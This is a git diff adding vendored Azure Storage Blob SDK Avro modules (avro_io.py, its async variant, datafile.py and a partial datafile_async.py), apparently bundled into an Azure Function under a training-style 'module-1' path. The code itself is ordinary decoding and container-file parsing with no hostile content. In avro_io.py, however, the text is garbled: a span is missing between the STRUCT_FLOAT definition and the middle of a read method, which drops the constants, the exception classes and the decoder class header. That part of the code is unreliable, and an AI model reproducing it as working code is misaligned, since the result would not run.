b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/schema.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/schema.cpython-39.pyc new file mode 100644 index 0000000..832219a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/schema.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io.py new file mode 100644 index 0000000..e79cd7b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io.py @@ -0,0 +1,464 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +"""Input/output utilities. + +Includes: + - i/o-specific constants + - i/o-specific exceptions + - schema validation + - leaf value encoding and decoding + - datum reader/writer stuff (?) + +Also includes a generic representation for data, which uses the +following mapping: + - Schema records are implemented as dict. + - Schema arrays are implemented as list. + - Schema maps are implemented as dict. + - Schema strings are implemented as unicode. + - Schema bytes are implemented as str. + - Schema ints are implemented as int. + - Schema longs are implemented as long. + - Schema floats are implemented as float. + - Schema doubles are implemented as float. + - Schema booleans are implemented as bool. +""" + +import json +import logging +import struct +import sys + +from ..avro import schema + +PY3 = sys.version_info[0] == 3 + +logger = logging.getLogger(__name__) + +# ------------------------------------------------------------------------------ +# Constants + +STRUCT_FLOAT = struct.Struct('= 0), n + input_bytes = self.reader.read(n) + if n > 0 and not input_bytes: + raise StopIteration + assert (len(input_bytes) == n), input_bytes + return input_bytes + + @staticmethod + def read_null(): + """ + null is written as zero bytes + """ + return None + + def read_boolean(self): + """ + a boolean is written as a single byte + whose value is either 0 (false) or 1 (true). + """ + b = ord(self.read(1)) + if b == 1: + return True + if b == 0: + return False + fail_msg = "Invalid value for boolean: %s" % b + raise schema.AvroException(fail_msg) + + def read_int(self): + """ + int and long values are written using variable-length, zig-zag coding. + """ + return self.read_long() + + def read_long(self): + """ + int and long values are written using variable-length, zig-zag coding. + """ + b = ord(self.read(1)) + n = b & 0x7F + shift = 7 + while (b & 0x80) != 0: + b = ord(self.read(1)) + n |= (b & 0x7F) << shift + shift += 7 + datum = (n >> 1) ^ -(n & 1) + return datum + + def read_float(self): + """ + A float is written as 4 bytes. + The float is converted into a 32-bit integer using a method equivalent to + Java's floatToIntBits and then encoded in little-endian format. + """ + return STRUCT_FLOAT.unpack(self.read(4))[0] + + def read_double(self): + """ + A double is written as 8 bytes. + The double is converted into a 64-bit integer using a method equivalent to + Java's doubleToLongBits and then encoded in little-endian format. + """ + return STRUCT_DOUBLE.unpack(self.read(8))[0] + + def read_bytes(self): + """ + Bytes are encoded as a long followed by that many bytes of data. + """ + nbytes = self.read_long() + assert (nbytes >= 0), nbytes + return self.read(nbytes) + + def read_utf8(self): + """ + A string is encoded as a long followed by + that many bytes of UTF-8 encoded character data. + """ + input_bytes = self.read_bytes() + if PY3: + try: + return input_bytes.decode('utf-8') + except UnicodeDecodeError as exn: + logger.error('Invalid UTF-8 input bytes: %r', input_bytes) + raise exn + else: + # PY2 + return unicode(input_bytes, "utf-8") # pylint: disable=undefined-variable + + def skip_null(self): + pass + + def skip_boolean(self): + self.skip(1) + + def skip_int(self): + self.skip_long() + + def skip_long(self): + b = ord(self.read(1)) + while (b & 0x80) != 0: + b = ord(self.read(1)) + + def skip_float(self): + self.skip(4) + + def skip_double(self): + self.skip(8) + + def skip_bytes(self): + self.skip(self.read_long()) + + def skip_utf8(self): + self.skip_bytes() + + def skip(self, n): + self.reader.seek(self.reader.tell() + n) + + +# ------------------------------------------------------------------------------ +# DatumReader + + +class DatumReader(object): + """Deserialize Avro-encoded data into a Python data structure.""" + + def __init__(self, writer_schema=None): + """ + As defined in the Avro specification, we call the schema encoded + in the data the "writer's schema". + """ + self._writer_schema = writer_schema + + # read/write properties + def set_writer_schema(self, writer_schema): + self._writer_schema = writer_schema + + writer_schema = property(lambda self: self._writer_schema, + set_writer_schema) + + def read(self, decoder): + return self.read_data(self.writer_schema, decoder) + + def read_data(self, writer_schema, decoder): + # function dispatch for reading data based on type of writer's schema + if writer_schema.type == 'null': + result = decoder.read_null() + elif writer_schema.type == 'boolean': + result = decoder.read_boolean() + elif writer_schema.type == 'string': + result = decoder.read_utf8() + elif writer_schema.type == 'int': + result = decoder.read_int() + elif writer_schema.type == 'long': + result = decoder.read_long() + elif writer_schema.type == 'float': + result = decoder.read_float() + elif writer_schema.type == 'double': + result = decoder.read_double() + elif writer_schema.type == 'bytes': + result = decoder.read_bytes() + elif writer_schema.type == 'fixed': + result = self.read_fixed(writer_schema, decoder) + elif writer_schema.type == 'enum': + result = self.read_enum(writer_schema, decoder) + elif writer_schema.type == 'array': + result = self.read_array(writer_schema, decoder) + elif writer_schema.type == 'map': + result = self.read_map(writer_schema, decoder) + elif writer_schema.type in ['union', 'error_union']: + result = self.read_union(writer_schema, decoder) + elif writer_schema.type in ['record', 'error', 'request']: + result = self.read_record(writer_schema, decoder) + else: + fail_msg = "Cannot read unknown schema type: %s" % writer_schema.type + raise schema.AvroException(fail_msg) + return result + + def skip_data(self, writer_schema, decoder): + if writer_schema.type == 'null': + result = decoder.skip_null() + elif writer_schema.type == 'boolean': + result = decoder.skip_boolean() + elif writer_schema.type == 'string': + result = decoder.skip_utf8() + elif writer_schema.type == 'int': + result = decoder.skip_int() + elif writer_schema.type == 'long': + result = decoder.skip_long() + elif writer_schema.type == 'float': + result = decoder.skip_float() + elif writer_schema.type == 'double': + result = decoder.skip_double() + elif writer_schema.type == 'bytes': + result = decoder.skip_bytes() + elif writer_schema.type == 'fixed': + result = self.skip_fixed(writer_schema, decoder) + elif writer_schema.type == 'enum': + result = self.skip_enum(decoder) + elif writer_schema.type == 'array': + self.skip_array(writer_schema, decoder) + result = None + elif writer_schema.type == 'map': + self.skip_map(writer_schema, decoder) + result = None + elif writer_schema.type in ['union', 'error_union']: + result = self.skip_union(writer_schema, decoder) + elif writer_schema.type in ['record', 'error', 'request']: + self.skip_record(writer_schema, decoder) + result = None + else: + fail_msg = "Unknown schema type: %s" % writer_schema.type + raise schema.AvroException(fail_msg) + return result + + @staticmethod + def read_fixed(writer_schema, decoder): + """ + Fixed instances are encoded using the number of bytes declared + in the schema. + """ + return decoder.read(writer_schema.size) + + @staticmethod + def skip_fixed(writer_schema, decoder): + return decoder.skip(writer_schema.size) + + @staticmethod + def read_enum(writer_schema, decoder): + """ + An enum is encoded by a int, representing the zero-based position + of the symbol in the schema. + """ + # read data + index_of_symbol = decoder.read_int() + if index_of_symbol >= len(writer_schema.symbols): + fail_msg = "Can't access enum index %d for enum with %d symbols" \ + % (index_of_symbol, len(writer_schema.symbols)) + raise SchemaResolutionException(fail_msg, writer_schema) + read_symbol = writer_schema.symbols[index_of_symbol] + return read_symbol + + @staticmethod + def skip_enum(decoder): + return decoder.skip_int() + + def read_array(self, writer_schema, decoder): + """ + Arrays are encoded as a series of blocks. + + Each block consists of a long count value, + followed by that many array items. + A block with count zero indicates the end of the array. + Each item is encoded per the array's item schema. + + If a block's count is negative, + then the count is followed immediately by a long block size, + indicating the number of bytes in the block. + The actual count in this case + is the absolute value of the count written. + """ + read_items = [] + block_count = decoder.read_long() + while block_count != 0: + if block_count < 0: + block_count = -block_count + decoder.read_long() + for _ in range(block_count): + read_items.append(self.read_data(writer_schema.items, decoder)) + block_count = decoder.read_long() + return read_items + + def skip_array(self, writer_schema, decoder): + block_count = decoder.read_long() + while block_count != 0: + if block_count < 0: + block_size = decoder.read_long() + decoder.skip(block_size) + else: + for _ in range(block_count): + self.skip_data(writer_schema.items, decoder) + block_count = decoder.read_long() + + def read_map(self, writer_schema, decoder): + """ + Maps are encoded as a series of blocks. + + Each block consists of a long count value, + followed by that many key/value pairs. + A block with count zero indicates the end of the map. + Each item is encoded per the map's value schema. + + If a block's count is negative, + then the count is followed immediately by a long block size, + indicating the number of bytes in the block. + The actual count in this case + is the absolute value of the count written. + """ + read_items = {} + block_count = decoder.read_long() + while block_count != 0: + if block_count < 0: + block_count = -block_count + decoder.read_long() + for _ in range(block_count): + key = decoder.read_utf8() + read_items[key] = self.read_data(writer_schema.values, decoder) + block_count = decoder.read_long() + return read_items + + def skip_map(self, writer_schema, decoder): + block_count = decoder.read_long() + while block_count != 0: + if block_count < 0: + block_size = decoder.read_long() + decoder.skip(block_size) + else: + for _ in range(block_count): + decoder.skip_utf8() + self.skip_data(writer_schema.values, decoder) + block_count = decoder.read_long() + + def read_union(self, writer_schema, decoder): + """ + A union is encoded by first writing a long value indicating + the zero-based position within the union of the schema of its value. + The value is then encoded per the indicated schema within the union. + """ + # schema resolution + index_of_schema = int(decoder.read_long()) + if index_of_schema >= len(writer_schema.schemas): + fail_msg = "Can't access branch index %d for union with %d branches" \ + % (index_of_schema, len(writer_schema.schemas)) + raise SchemaResolutionException(fail_msg, writer_schema) + selected_writer_schema = writer_schema.schemas[index_of_schema] + + # read data + return self.read_data(selected_writer_schema, decoder) + + def skip_union(self, writer_schema, decoder): + index_of_schema = int(decoder.read_long()) + if index_of_schema >= len(writer_schema.schemas): + fail_msg = "Can't access branch index %d for union with %d branches" \ + % (index_of_schema, len(writer_schema.schemas)) + raise SchemaResolutionException(fail_msg, writer_schema) + return self.skip_data(writer_schema.schemas[index_of_schema], decoder) + + def read_record(self, writer_schema, decoder): + """ + A record is encoded by encoding the values of its fields + in the order that they are declared. In other words, a record + is encoded as just the concatenation of the encodings of its fields. + Field values are encoded per their schema. + + Schema Resolution: + * the ordering of fields may be different: fields are matched by name. + * schemas for fields with the same name in both records are resolved + recursively. + * if the writer's record contains a field with a name not present in the + reader's record, the writer's value for that field is ignored. + * if the reader's record schema has a field that contains a default value, + and writer's schema does not have a field with the same name, then the + reader should use the default value from its field. + * if the reader's record schema has a field with no default value, and + writer's schema does not have a field with the same name, then the + field's value is unset. + """ + # schema resolution + read_record = {} + for field in writer_schema.fields: + field_val = self.read_data(field.type, decoder) + read_record[field.name] = field_val + return read_record + + def skip_record(self, writer_schema, decoder): + for field in writer_schema.fields: + self.skip_data(field.type, decoder) + + +# ------------------------------------------------------------------------------ + +if __name__ == '__main__': + raise Exception('Not a standalone module') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io_async.py new file mode 100644 index 0000000..f0b3eae --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io_async.py @@ -0,0 +1,448 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +"""Input/output utilities. + +Includes: + - i/o-specific constants + - i/o-specific exceptions + - schema validation + - leaf value encoding and decoding + - datum reader/writer stuff (?) + +Also includes a generic representation for data, which uses the +following mapping: + - Schema records are implemented as dict. + - Schema arrays are implemented as list. + - Schema maps are implemented as dict. + - Schema strings are implemented as unicode. + - Schema bytes are implemented as str. + - Schema ints are implemented as int. + - Schema longs are implemented as long. + - Schema floats are implemented as float. + - Schema doubles are implemented as float. + - Schema booleans are implemented as bool. +""" + +import logging +import sys + +from ..avro import schema + +from .avro_io import STRUCT_FLOAT, STRUCT_DOUBLE, SchemaResolutionException + +PY3 = sys.version_info[0] == 3 + +logger = logging.getLogger(__name__) + +# ------------------------------------------------------------------------------ +# Decoder + + +class AsyncBinaryDecoder(object): + """Read leaf values.""" + + def __init__(self, reader): + """ + reader is a Python object on which we can call read, seek, and tell. + """ + self._reader = reader + + @property + def reader(self): + """Reports the reader used by this decoder.""" + return self._reader + + async def read(self, n): + """Read n bytes. + + Args: + n: Number of bytes to read. + Returns: + The next n bytes from the input. + """ + assert (n >= 0), n + input_bytes = await self.reader.read(n) + if n > 0 and not input_bytes: + raise StopAsyncIteration + assert (len(input_bytes) == n), input_bytes + return input_bytes + + @staticmethod + def read_null(): + """ + null is written as zero bytes + """ + return None + + async def read_boolean(self): + """ + a boolean is written as a single byte + whose value is either 0 (false) or 1 (true). + """ + b = ord(await self.read(1)) + if b == 1: + return True + if b == 0: + return False + fail_msg = "Invalid value for boolean: %s" % b + raise schema.AvroException(fail_msg) + + async def read_int(self): + """ + int and long values are written using variable-length, zig-zag coding. + """ + return await self.read_long() + + async def read_long(self): + """ + int and long values are written using variable-length, zig-zag coding. + """ + b = ord(await self.read(1)) + n = b & 0x7F + shift = 7 + while (b & 0x80) != 0: + b = ord(await self.read(1)) + n |= (b & 0x7F) << shift + shift += 7 + datum = (n >> 1) ^ -(n & 1) + return datum + + async def read_float(self): + """ + A float is written as 4 bytes. + The float is converted into a 32-bit integer using a method equivalent to + Java's floatToIntBits and then encoded in little-endian format. + """ + return STRUCT_FLOAT.unpack(await self.read(4))[0] + + async def read_double(self): + """ + A double is written as 8 bytes. + The double is converted into a 64-bit integer using a method equivalent to + Java's doubleToLongBits and then encoded in little-endian format. + """ + return STRUCT_DOUBLE.unpack(await self.read(8))[0] + + async def read_bytes(self): + """ + Bytes are encoded as a long followed by that many bytes of data. + """ + nbytes = await self.read_long() + assert (nbytes >= 0), nbytes + return await self.read(nbytes) + + async def read_utf8(self): + """ + A string is encoded as a long followed by + that many bytes of UTF-8 encoded character data. + """ + input_bytes = await self.read_bytes() + if PY3: + try: + return input_bytes.decode('utf-8') + except UnicodeDecodeError as exn: + logger.error('Invalid UTF-8 input bytes: %r', input_bytes) + raise exn + else: + # PY2 + return unicode(input_bytes, "utf-8") # pylint: disable=undefined-variable + + def skip_null(self): + pass + + async def skip_boolean(self): + await self.skip(1) + + async def skip_int(self): + await self.skip_long() + + async def skip_long(self): + b = ord(await self.read(1)) + while (b & 0x80) != 0: + b = ord(await self.read(1)) + + async def skip_float(self): + await self.skip(4) + + async def skip_double(self): + await self.skip(8) + + async def skip_bytes(self): + await self.skip(await self.read_long()) + + async def skip_utf8(self): + await self.skip_bytes() + + async def skip(self, n): + await self.reader.seek(await self.reader.tell() + n) + + +# ------------------------------------------------------------------------------ +# DatumReader + + +class AsyncDatumReader(object): + """Deserialize Avro-encoded data into a Python data structure.""" + + def __init__(self, writer_schema=None): + """ + As defined in the Avro specification, we call the schema encoded + in the data the "writer's schema", and the schema expected by the + reader the "reader's schema". + """ + self._writer_schema = writer_schema + + # read/write properties + def set_writer_schema(self, writer_schema): + self._writer_schema = writer_schema + + writer_schema = property(lambda self: self._writer_schema, + set_writer_schema) + + async def read(self, decoder): + return await self.read_data(self.writer_schema, decoder) + + async def read_data(self, writer_schema, decoder): + # function dispatch for reading data based on type of writer's schema + if writer_schema.type == 'null': + result = decoder.read_null() + elif writer_schema.type == 'boolean': + result = await decoder.read_boolean() + elif writer_schema.type == 'string': + result = await decoder.read_utf8() + elif writer_schema.type == 'int': + result = await decoder.read_int() + elif writer_schema.type == 'long': + result = await decoder.read_long() + elif writer_schema.type == 'float': + result = await decoder.read_float() + elif writer_schema.type == 'double': + result = await decoder.read_double() + elif writer_schema.type == 'bytes': + result = await decoder.read_bytes() + elif writer_schema.type == 'fixed': + result = await self.read_fixed(writer_schema, decoder) + elif writer_schema.type == 'enum': + result = await self.read_enum(writer_schema, decoder) + elif writer_schema.type == 'array': + result = await self.read_array(writer_schema, decoder) + elif writer_schema.type == 'map': + result = await self.read_map(writer_schema, decoder) + elif writer_schema.type in ['union', 'error_union']: + result = await self.read_union(writer_schema, decoder) + elif writer_schema.type in ['record', 'error', 'request']: + result = await self.read_record(writer_schema, decoder) + else: + fail_msg = "Cannot read unknown schema type: %s" % writer_schema.type + raise schema.AvroException(fail_msg) + return result + + async def skip_data(self, writer_schema, decoder): + if writer_schema.type == 'null': + result = decoder.skip_null() + elif writer_schema.type == 'boolean': + result = await decoder.skip_boolean() + elif writer_schema.type == 'string': + result = await decoder.skip_utf8() + elif writer_schema.type == 'int': + result = await decoder.skip_int() + elif writer_schema.type == 'long': + result = await decoder.skip_long() + elif writer_schema.type == 'float': + result = await decoder.skip_float() + elif writer_schema.type == 'double': + result = await decoder.skip_double() + elif writer_schema.type == 'bytes': + result = await decoder.skip_bytes() + elif writer_schema.type == 'fixed': + result = await self.skip_fixed(writer_schema, decoder) + elif writer_schema.type == 'enum': + result = await self.skip_enum(decoder) + elif writer_schema.type == 'array': + await self.skip_array(writer_schema, decoder) + result = None + elif writer_schema.type == 'map': + await self.skip_map(writer_schema, decoder) + result = None + elif writer_schema.type in ['union', 'error_union']: + result = await self.skip_union(writer_schema, decoder) + elif writer_schema.type in ['record', 'error', 'request']: + await self.skip_record(writer_schema, decoder) + result = None + else: + fail_msg = "Unknown schema type: %s" % writer_schema.type + raise schema.AvroException(fail_msg) + return result + + @staticmethod + async def read_fixed(writer_schema, decoder): + """ + Fixed instances are encoded using the number of bytes declared + in the schema. + """ + return await decoder.read(writer_schema.size) + + @staticmethod + async def skip_fixed(writer_schema, decoder): + return await decoder.skip(writer_schema.size) + + @staticmethod + async def read_enum(writer_schema, decoder): + """ + An enum is encoded by a int, representing the zero-based position + of the symbol in the schema. + """ + # read data + index_of_symbol = await decoder.read_int() + if index_of_symbol >= len(writer_schema.symbols): + fail_msg = "Can't access enum index %d for enum with %d symbols" \ + % (index_of_symbol, len(writer_schema.symbols)) + raise SchemaResolutionException(fail_msg, writer_schema) + read_symbol = writer_schema.symbols[index_of_symbol] + return read_symbol + + @staticmethod + async def skip_enum(decoder): + return await decoder.skip_int() + + async def read_array(self, writer_schema, decoder): + """ + Arrays are encoded as a series of blocks. + + Each block consists of a long count value, + followed by that many array items. + A block with count zero indicates the end of the array. + Each item is encoded per the array's item schema. + + If a block's count is negative, + then the count is followed immediately by a long block size, + indicating the number of bytes in the block. + The actual count in this case + is the absolute value of the count written. + """ + read_items = [] + block_count = await decoder.read_long() + while block_count != 0: + if block_count < 0: + block_count = -block_count + await decoder.read_long() + for _ in range(block_count): + read_items.append(await self.read_data(writer_schema.items, decoder)) + block_count = await decoder.read_long() + return read_items + + async def skip_array(self, writer_schema, decoder): + block_count = await decoder.read_long() + while block_count != 0: + if block_count < 0: + block_size = await decoder.read_long() + await decoder.skip(block_size) + else: + for _ in range(block_count): + await self.skip_data(writer_schema.items, decoder) + block_count = await decoder.read_long() + + async def read_map(self, writer_schema, decoder): + """ + Maps are encoded as a series of blocks. + + Each block consists of a long count value, + followed by that many key/value pairs. + A block with count zero indicates the end of the map. + Each item is encoded per the map's value schema. + + If a block's count is negative, + then the count is followed immediately by a long block size, + indicating the number of bytes in the block. + The actual count in this case + is the absolute value of the count written. + """ + read_items = {} + block_count = await decoder.read_long() + while block_count != 0: + if block_count < 0: + block_count = -block_count + await decoder.read_long() + for _ in range(block_count): + key = await decoder.read_utf8() + read_items[key] = await self.read_data(writer_schema.values, decoder) + block_count = await decoder.read_long() + return read_items + + async def skip_map(self, writer_schema, decoder): + block_count = await decoder.read_long() + while block_count != 0: + if block_count < 0: + block_size = await decoder.read_long() + await decoder.skip(block_size) + else: + for _ in range(block_count): + await decoder.skip_utf8() + await self.skip_data(writer_schema.values, decoder) + block_count = await decoder.read_long() + + async def read_union(self, writer_schema, decoder): + """ + A union is encoded by first writing a long value indicating + the zero-based position within the union of the schema of its value. + The value is then encoded per the indicated schema within the union. + """ + # schema resolution + index_of_schema = int(await decoder.read_long()) + if index_of_schema >= len(writer_schema.schemas): + fail_msg = "Can't access branch index %d for union with %d branches" \ + % (index_of_schema, len(writer_schema.schemas)) + raise SchemaResolutionException(fail_msg, writer_schema) + selected_writer_schema = writer_schema.schemas[index_of_schema] + + # read data + return await self.read_data(selected_writer_schema, decoder) + + async def skip_union(self, writer_schema, decoder): + index_of_schema = int(await decoder.read_long()) + if index_of_schema >= len(writer_schema.schemas): + fail_msg = "Can't access branch index %d for union with %d branches" \ + % (index_of_schema, len(writer_schema.schemas)) + raise SchemaResolutionException(fail_msg, writer_schema) + return await self.skip_data(writer_schema.schemas[index_of_schema], decoder) + + async def read_record(self, writer_schema, decoder): + """ + A record is encoded by encoding the values of its fields + in the order that they are declared. In other words, a record + is encoded as just the concatenation of the encodings of its fields. + Field values are encoded per their schema. + + Schema Resolution: + * the ordering of fields may be different: fields are matched by name. + * schemas for fields with the same name in both records are resolved + recursively. + * if the writer's record contains a field with a name not present in the + reader's record, the writer's value for that field is ignored. + * if the reader's record schema has a field that contains a default value, + and writer's schema does not have a field with the same name, then the + reader should use the default value from its field. + * if the reader's record schema has a field with no default value, and + writer's schema does not have a field with the same name, then the + field's value is unset. + """ + # schema resolution + read_record = {} + for field in writer_schema.fields: + field_val = await self.read_data(field.type, decoder) + read_record[field.name] = field_val + return read_record + + async def skip_record(self, writer_schema, decoder): + for field in writer_schema.fields: + await self.skip_data(field.type, decoder) + + +# ------------------------------------------------------------------------------ + +if __name__ == '__main__': + raise Exception('Not a standalone module') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile.py new file mode 100644 index 0000000..c27f79a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile.py @@ -0,0 +1,266 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +"""Read/Write Avro File Object Containers.""" + +import io +import logging +import sys +import zlib + +from ..avro import avro_io +from ..avro import schema + +PY3 = sys.version_info[0] == 3 + +logger = logging.getLogger(__name__) + +# ------------------------------------------------------------------------------ +# Constants + +# Version of the container file: +VERSION = 1 + +if PY3: + MAGIC = b'Obj' + bytes([VERSION]) + MAGIC_SIZE = len(MAGIC) +else: + MAGIC = 'Obj' + chr(VERSION) + MAGIC_SIZE = len(MAGIC) + +# Size of the synchronization marker, in number of bytes: +SYNC_SIZE = 16 + +# Schema of the container header: +META_SCHEMA = schema.parse(""" +{ + "type": "record", "name": "org.apache.avro.file.Header", + "fields": [{ + "name": "magic", + "type": {"type": "fixed", "name": "magic", "size": %(magic_size)d} + }, { + "name": "meta", + "type": {"type": "map", "values": "bytes"} + }, { + "name": "sync", + "type": {"type": "fixed", "name": "sync", "size": %(sync_size)d} + }] +} +""" % { + 'magic_size': MAGIC_SIZE, + 'sync_size': SYNC_SIZE, +}) + +# Codecs supported by container files: +VALID_CODECS = frozenset(['null', 'deflate']) + +# Metadata key associated to the schema: +SCHEMA_KEY = "avro.schema" + + +# ------------------------------------------------------------------------------ +# Exceptions + + +class DataFileException(schema.AvroException): + """Problem reading or writing file object containers.""" + +# ------------------------------------------------------------------------------ + + +class DataFileReader(object): # pylint: disable=too-many-instance-attributes + """Read files written by DataFileWriter.""" + + def __init__(self, reader, datum_reader, **kwargs): + """Initializes a new data file reader. + + Args: + reader: Open file to read from. + datum_reader: Avro datum reader. + """ + self._reader = reader + self._raw_decoder = avro_io.BinaryDecoder(reader) + self._header_reader = kwargs.pop('header_reader', None) + self._header_decoder = None if self._header_reader is None else avro_io.BinaryDecoder(self._header_reader) + self._datum_decoder = None # Maybe reset at every block. + self._datum_reader = datum_reader + + # In case self._reader only has partial content(without header). + # seek(0, 0) to make sure read the (partial)content from beginning. + self._reader.seek(0, 0) + + # read the header: magic, meta, sync + self._read_header() + + # ensure codec is valid + avro_codec_raw = self.get_meta('avro.codec') + if avro_codec_raw is None: + self.codec = "null" + else: + self.codec = avro_codec_raw.decode('utf-8') + if self.codec not in VALID_CODECS: + raise DataFileException('Unknown codec: %s.' % self.codec) + + # get ready to read + self._block_count = 0 + + # object_position is to support reading from current position in the future read, + # no need to downloading from the beginning of avro. + if hasattr(self._reader, 'object_position'): + self.reader.track_object_position() + + self._cur_object_index = 0 + # header_reader indicates reader only has partial content. The reader doesn't have block header, + # so we read use the block count stored last time. + # Also ChangeFeed only has codec==null, so use _raw_decoder is good. + if self._header_reader is not None: + self._datum_decoder = self._raw_decoder + + self.datum_reader.writer_schema = ( + schema.parse(self.get_meta(SCHEMA_KEY).decode('utf-8'))) + + def __enter__(self): + return self + + def __exit__(self, data_type, value, traceback): + # Perform a close if there's no exception + if data_type is None: + self.close() + + def __iter__(self): + return self + + # read-only properties + @property + def reader(self): + return self._reader + + @property + def raw_decoder(self): + return self._raw_decoder + + @property + def datum_decoder(self): + return self._datum_decoder + + @property + def datum_reader(self): + return self._datum_reader + + @property + def sync_marker(self): + return self._sync_marker + + @property + def meta(self): + return self._meta + + # read/write properties + @property + def block_count(self): + return self._block_count + + def get_meta(self, key): + """Reports the value of a given metadata key. + + Args: + key: Metadata key (string) to report the value of. + Returns: + Value associated to the metadata key, as bytes. + """ + return self._meta.get(key) + + def _read_header(self): + header_reader = self._header_reader if self._header_reader else self._reader + header_decoder = self._header_decoder if self._header_decoder else self._raw_decoder + + # seek to the beginning of the file to get magic block + header_reader.seek(0, 0) + + # read header into a dict + header = self.datum_reader.read_data(META_SCHEMA, header_decoder) + + # check magic number + if header.get('magic') != MAGIC: + fail_msg = "Not an Avro data file: %s doesn't match %s." \ + % (header.get('magic'), MAGIC) + raise schema.AvroException(fail_msg) + + # set metadata + self._meta = header['meta'] + + # set sync marker + self._sync_marker = header['sync'] + + def _read_block_header(self): + self._block_count = self.raw_decoder.read_long() + if self.codec == "null": + # Skip a long; we don't need to use the length. + self.raw_decoder.skip_long() + self._datum_decoder = self._raw_decoder + elif self.codec == 'deflate': + # Compressed data is stored as (length, data), which + # corresponds to how the "bytes" type is encoded. + data = self.raw_decoder.read_bytes() + # -15 is the log of the window size; negative indicates + # "raw" (no zlib headers) decompression. See zlib.h. + uncompressed = zlib.decompress(data, -15) + self._datum_decoder = avro_io.BinaryDecoder(io.BytesIO(uncompressed)) + else: + raise DataFileException("Unknown codec: %r" % self.codec) + + def _skip_sync(self): + """ + Read the length of the sync marker; if it matches the sync marker, + return True. Otherwise, seek back to where we started and return False. + """ + proposed_sync_marker = self.reader.read(SYNC_SIZE) + if SYNC_SIZE > 0 and not proposed_sync_marker: + raise StopIteration + if proposed_sync_marker != self.sync_marker: + self.reader.seek(-SYNC_SIZE, 1) + + def __next__(self): + """Return the next datum in the file.""" + if self.block_count == 0: + self._skip_sync() + + # object_position is to support reading from current position in the future read, + # no need to downloading from the beginning of avro file with this attr. + if hasattr(self._reader, 'object_position'): + self.reader.track_object_position() + self._cur_object_index = 0 + + self._read_block_header() + + datum = self.datum_reader.read(self.datum_decoder) + self._block_count -= 1 + self._cur_object_index += 1 + + # object_position is to support reading from current position in the future read, + # This will track the index of the next item to be read. + # This will also track the offset before the next sync marker. + if hasattr(self._reader, 'object_position'): + if self.block_count == 0: + # the next event to be read is at index 0 in the new chunk of blocks, + self.reader.track_object_position() + self.reader.set_object_index(0) + else: + self.reader.set_object_index(self._cur_object_index) + + return datum + + # PY2 + def next(self): + return self.__next__() + + def close(self): + """Close this reader.""" + self.reader.close() + + +if __name__ == '__main__': + raise Exception('Not a standalone module') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile_async.py new file mode 100644 index 0000000..f0cd821 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile_async.py @@ -0,0 +1,215 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +"""Read/Write Avro File Object Containers.""" + +import logging +import sys + +from ..avro import avro_io_async +from ..avro import schema +from .datafile import DataFileException +from .datafile import MAGIC, SYNC_SIZE, META_SCHEMA, SCHEMA_KEY + + +PY3 = sys.version_info[0] == 3 + +logger = logging.getLogger(__name__) + +# ------------------------------------------------------------------------------ +# Constants + +# Codecs supported by container files: +VALID_CODECS = frozenset(['null']) + + +class AsyncDataFileReader(object): # pylint: disable=too-many-instance-attributes + """Read files written by DataFileWriter.""" + + def __init__(self, reader, datum_reader, **kwargs): + """Initializes a new data file reader. + + Args: + reader: Open file to read from. + datum_reader: Avro datum reader. + """ + self._reader = reader + self._raw_decoder = avro_io_async.AsyncBinaryDecoder(reader) + self._header_reader = kwargs.pop('header_reader', None) + self._header_decoder = None if self._header_reader is None else \ + avro_io_async.AsyncBinaryDecoder(self._header_reader) + self._datum_decoder = None # Maybe reset at every block. + self._datum_reader = datum_reader + self.codec = "null" + self._block_count = 0 + self._cur_object_index = 0 + self._meta = None + self._sync_marker = None + + async def init(self): + # In case self._reader only has partial content(without header). + # seek(0, 0) to make sure read the (partial)content from beginning. + await self._reader.seek(0, 0) + + # read the header: magic, meta, sync + await self._read_header() + + # ensure codec is valid + avro_codec_raw = self.get_meta('avro.codec') + if avro_codec_raw is None: + self.codec = "null" + else: + self.codec = avro_codec_raw.decode('utf-8') + if self.codec not in VALID_CODECS: + raise DataFileException('Unknown codec: %s.' % self.codec) + + # get ready to read + self._block_count = 0 + + # object_position is to support reading from current position in 